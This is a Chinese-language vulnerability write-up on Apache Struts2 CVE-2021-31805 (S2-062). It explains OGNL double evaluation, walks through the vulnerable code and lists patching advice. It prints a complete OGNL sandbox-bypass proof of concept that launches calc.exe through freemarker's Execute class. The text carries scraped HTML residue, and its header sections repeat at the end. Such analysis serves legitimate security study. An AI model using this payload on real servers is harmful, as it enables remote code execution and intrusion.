Apache Struts2 远程代码执行漏洞(CVE-2021-31805)深度分析与利用指南<\/h1>

漏洞概述<\/h2>
漏洞编号<\/strong>: CVE-2021-31805 (S2-062)
影响版本<\/strong>: Apache Struts2 2.0.0 至 2.5.29
漏洞类型<\/strong>: 远程代码执行(RCE)
CVSS评分<\/strong>: 9.8 (Critical)
漏洞来源<\/strong>: CVE-2020-17530 (S2-061)修复不完整导致<\/p>

漏洞背景<\/h2>
Apache Struts2是一个用于开发JavaEE网络应用程序的开源MVC框架。该漏洞是由于Struts2框架对OGNL表达式双重评估处理不当导致的远程代码执行漏洞，是之前CVE-2020-17530漏洞修复不完整的结果。<\/p>
环境搭建<\/h2>
复现环境选择<\/h3>

快速复现<\/strong>:<\/p>

使用Docker集成环境<\/li>
在线漏洞靶场<\/li> <\/ul> <\/li>

深度分析环境<\/strong>:<\/p>

使用IntelliJ IDEA手工搭建<\/li>
基于S2-061的demo改造<\/li> <\/ul> <\/li> <\/ol>
环境改造步骤<\/h3>

修改pom.xml<\/strong>:<\/p>
<dependency><\/span> <\/span><\/span> <groupId><\/span>org.apache.struts<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>struts2-core<\/artifactId><\/span> <\/span><\/span> <version><\/span>2.5.26<\/version><\/span> <\/span><\/span><\/dependency><\/span> <\/span><\/span><\/code><\/pre><\/li> 修改前端JSP文件<\/strong>:<\/p> <s:textfield name="%{payload}" \/> <\/code><\/pre> <\/li> 修改Action类<\/strong>:<\/p> public<\/span> class<\/span> VulnAction<\/span> extends<\/span> ActionSupport {<\/span> <\/span><\/span> private<\/span> String payload;<\/span> <\/span><\/span> \/\/ getter和setter方法 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 前置知识<\/h2> Struts2架构流程<\/h3> 客户端提交Web请求<\/li> Servlet容器初步解析请求<\/li> 核心处理器FilterDispatcher协调处理<\/li> 拦截器应用通用功能(工作流、验证等)<\/li> Action方法执行<\/li> 结果渲染输出<\/li> <\/ol> OGNL表达式语言<\/h3> OGNL (Object-Graph Navigation Language)<\/strong> 是Struts2的默认表达式语言，具有以下特性:<\/p> 获取和设置Java对象属性<\/li> 调用Java对象方法<\/li> 自动类型转换<\/li> <\/ul> OGNL执行三要素<\/h4> 表达式(Expression)<\/strong>: 语义字符串<\/li> 根对象(Root Object)<\/strong>: 操作的目标对象<\/li> 上下文环境(Context)<\/strong>: 执行环境<\/li> <\/ol> OGNL重要操作符<\/h4> #<\/code>: 访问上下文环境<\/li> %<\/code>: 强制OGNL解析字符串<\/li> $<\/code>: 引用国际化信息<\/li> <\/ul> 漏洞原理分析<\/h2> 漏洞触发流程<\/h3> 第一次OGNL解析<\/strong>:<\/p> 在evaluateParams<\/code>函数中调用findString<\/code><\/li> 对name<\/code>属性进行第一次OGNL赋值<\/li> <\/ul> <\/li> 属性检查<\/strong>:<\/p> 检查name<\/code>属性是否包含value<\/code><\/li> 检查name<\/code>属性是否为空<\/li> <\/ul> <\/li> 第二次OGNL解析<\/strong>:<\/p> 进入completeExpressionIfAltSyntax<\/code>函数<\/li> 自动添加%{}<\/code>包装<\/li> 通过findValue<\/code>进行第二次OGNL解析<\/li> <\/ul> <\/li> <\/ol> 关键代码分析<\/h3> \/\/ org.apache.struts2.components.UIBean#evaluateParams <\/span><\/span><\/span><\/span>protected<\/span> void<\/span> evaluateParams<\/span>()<\/span> {<\/span> <\/span><\/span> \/\/ 第一次OGNL解析 <\/span><\/span><\/span><\/span> String name =<\/span> findString(<\/span>this<\/span>.<\/span>name<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 属性检查 <\/span><\/span><\/span><\/span> if<\/span> (<\/span>name !=<\/span> null<\/span> &&<\/span> !<\/span>name.<\/span>isEmpty<\/span>()<\/span> &&<\/span> this<\/span>.<\/span>value<\/span> ==<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> \/\/ 进入completeExpressionIfAltSyntax <\/span><\/span><\/span><\/span> name =<\/span> completeExpressionIfAltSyntax(<\/span>name);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 第二次OGNL解析 <\/span><\/span><\/span><\/span> Object value =<\/span> findValue(<\/span>name);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>\/\/ org.apache.struts2.util.ComponentUtils#containsExpression <\/span><\/span><\/span><\/span>public<\/span> static<\/span> boolean<\/span> containsExpression<\/span>(<\/span>String expr)<\/span> {<\/span> <\/span><\/span> return<\/span> expr !=<\/span> null<\/span> &&<\/span> expr.<\/span>contains<\/span>(<\/span>"%{"<\/span>)<\/span> &&<\/span> expr.<\/span>contains<\/span>(<\/span>"}"<\/span>);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>沙箱绕过技术<\/h2> 原始S2-061利用方式<\/h3> %{<\/span> <\/span><\/span>(<\/span>#<\/span>request.<\/span>map<\/span>=<\/span>#<\/span>application.<\/span>get<\/span>(<\/span>'<\/span>org.<\/span>apache<\/span>.<\/span>tomcat<\/span>.<\/span>InstanceManager<\/span>'<\/span>)<\/span> <\/span><\/span>.<\/span>newInstance<\/span>(<\/span>'<\/span>org.<\/span>apache<\/span>.<\/span>commons<\/span>.<\/span>collections<\/span>.<\/span>BeanMap<\/span>'<\/span>)).<\/span>toString<\/span>().<\/span>substring<\/span>(<\/span>0<\/span>,<\/span>0<\/span>)<\/span> <\/span><\/span>+<\/span> <\/span><\/span>\/\/ 后续利用链... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>新绕过技术(2.5.26+)<\/h3> 创建BeanMap对象新方式<\/strong>:<\/p> #<\/span>@org.apache.commons.collections.BeanMap<\/span>@<\/span>{}<\/span> <\/span><\/span><\/code><\/pre><\/li> 完整利用POC<\/strong>:<\/p> %{<\/span> <\/span><\/span>(<\/span>#<\/span>request.<\/span>map<\/span>=<\/span>#<\/span>@org.apache.commons.collections.BeanMap<\/span>@<\/span>{}).<\/span>toString<\/span>().<\/span>substring<\/span>(<\/span>0<\/span>,<\/span>0<\/span>)<\/span> <\/span><\/span>+<\/span> <\/span><\/span>(<\/span>#<\/span>request.<\/span>map<\/span>.<\/span>setBean<\/span>(<\/span>#<\/span>request.<\/span>get<\/span>(<\/span>'<\/span>struts.<\/span>valueStack<\/span>'<\/span>))==<\/span>true<\/span>).<\/span>toString<\/span>().<\/span>substring<\/span>(<\/span>0<\/span>,<\/span>0<\/span>)<\/span> <\/span><\/span>+<\/span> <\/span><\/span>(<\/span>#<\/span>request.<\/span>map2<\/span>=<\/span>#<\/span>@org.apache.commons.collections.BeanMap<\/span>@<\/span>{}).<\/span>toString<\/span>().<\/span>substring<\/span>(<\/span>0<\/span>,<\/span>0<\/span>)<\/span> <\/span><\/span>+<\/span> <\/span><\/span>(<\/span>#<\/span>request.<\/span>map2<\/span>.<\/span>setBean<\/span>(<\/span>#<\/span>request.<\/span>get<\/span>(<\/span>'<\/span>map'<\/span>).<\/span>get<\/span>(<\/span>'<\/span>context'<\/span>))==<\/span>true<\/span>).<\/span>toString<\/span>().<\/span>substring<\/span>(<\/span>0<\/span>,<\/span>0<\/span>)<\/span> <\/span><\/span>+<\/span> <\/span><\/span>(<\/span>#<\/span>request.<\/span>map3<\/span>=<\/span>#<\/span>@org.apache.commons.collections.BeanMap<\/span>@<\/span>{}).<\/span>toString<\/span>().<\/span>substring<\/span>(<\/span>0<\/span>,<\/span>0<\/span>)<\/span> <\/span><\/span>+<\/span> <\/span><\/span>(<\/span>#<\/span>request.<\/span>map3<\/span>.<\/span>setBean<\/span>(<\/span>#<\/span>request.<\/span>get<\/span>(<\/span>'<\/span>map2'<\/span>).<\/span>get<\/span>(<\/span>'<\/span>memberAccess'<\/span>))==<\/span>true<\/span>).<\/span>toString<\/span>().<\/span>substring<\/span>(<\/span>0<\/span>,<\/span>0<\/span>)<\/span> <\/span><\/span>+<\/span> <\/span><\/span>(<\/span>#<\/span>request.<\/span>get<\/span>(<\/span>'<\/span>map3'<\/span>).<\/span>put<\/span>(<\/span>'<\/span>excludedPackageNames'<\/span>,<\/span>#<\/span>@org.apache.commons.collections.BeanMap<\/span>@<\/span>{}.<\/span>keySet<\/span>())==<\/span>true<\/span>).<\/span>toString<\/span>().<\/span>substring<\/span>(<\/span>0<\/span>,<\/span>0<\/span>)<\/span> <\/span><\/span>+<\/span> <\/span><\/span>(<\/span>#<\/span>request.<\/span>get<\/span>(<\/span>'<\/span>map3'<\/span>).<\/span>put<\/span>(<\/span>'<\/span>excludedClasses'<\/span>,<\/span>#<\/span>@org.apache.commons.collections.BeanMap<\/span>@<\/span>{}.<\/span>keySet<\/span>())==<\/span>true<\/span>).<\/span>toString<\/span>().<\/span>substring<\/span>(<\/span>0<\/span>,<\/span>0<\/span>)<\/span> <\/span><\/span>+<\/span> <\/span><\/span>(<\/span>#<\/span>application.<\/span>get<\/span>(<\/span>'<\/span>org.<\/span>apache<\/span>.<\/span>tomcat<\/span>.<\/span>InstanceManager<\/span>'<\/span>).<\/span>newInstance<\/span>(<\/span>'<\/span>freemarker.<\/span>template<\/span>.<\/span>utility<\/span>.<\/span>Execute<\/span>'<\/span>).<\/span>exec<\/span>({<\/span>'<\/span>calc.<\/span>exe<\/span>'<\/span>}))<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 动态调试指南<\/h2> 关键断点设置<\/strong>:<\/p> org.apache.struts2.views.jsp.ComponentTagSupport#doStartTag<\/code><\/li> org.apache.struts2.views.jsp.ComponentTagSupport#doEndTag<\/code><\/li> org.apache.struts2.components.UIBean#end<\/code><\/li> org.apache.struts2.components.UIBean#evaluateParams<\/code><\/li> <\/ul> <\/li> 调试流程<\/strong>:<\/p> 观察第一次OGNL解析过程<\/li> 跟踪属性检查逻辑<\/li> 分析第二次OGNL解析触发点<\/li> 验证沙箱绕过效果<\/li> <\/ul> <\/li> <\/ol> 修复建议<\/h2> 官方修复方案<\/strong>:<\/p> 升级到Struts 2.5.30或更高版本<\/li> 下载地址: Struts 2.5.30 Release Notes<\/a><\/li> <\/ul> <\/li> 临时缓解措施<\/strong>:<\/p> 禁用OGNL表达式功能<\/li> 严格过滤用户输入的%{}<\/code>格式内容<\/li> 限制可访问的Java类和包<\/li> <\/ul> <\/li> <\/ol> 参考资源<\/h2> Exploiting Struts RCE on 2.5.26<\/a><\/li> CVE-2020-17530 PoC<\/a><\/li> Struts2安全公告<\/a><\/li> <\/ol> 总结<\/h2> CVE-2021-31805漏洞展示了框架修复不完整可能带来的严重后果。通过深入分析该漏洞，我们可以更好地理解Struts2框架的工作原理和OGNL表达式的安全风险。防御此类漏洞需要开发人员和安全团队共同努力，及时更新补丁并实施纵深防御策略。<\/p>

Apache Struts2 远程代码执行漏洞(CVE-2021-31805)深度分析与利用指南<\/h1>

漏洞概述<\/h2> 漏洞编号<\/strong>: CVE-2021-31805 (S2-062) 影响版本<\/strong>: Apache Struts2 2.0.0 至 2.5.29 漏洞类型<\/strong>: 远程代码执行(RCE) CVSS评分<\/strong>: 9.8 (Critical) 漏洞来源<\/strong>: CVE-2020-17530 (S2-061)修复不完整导致<\/p>

环境搭建<\/h2>

前置知识<\/h2>

漏洞原理分析<\/h2>

沙箱绕过技术<\/h2>

漏洞概述<\/h2>
漏洞编号<\/strong>: CVE-2021-31805 (S2-062)
影响版本<\/strong>: Apache Struts2 2.0.0 至 2.5.29
漏洞类型<\/strong>: 远程代码执行(RCE)
CVSS评分<\/strong>: 9.8 (Critical)
漏洞来源<\/strong>: CVE-2020-17530 (S2-061)修复不完整导致<\/p>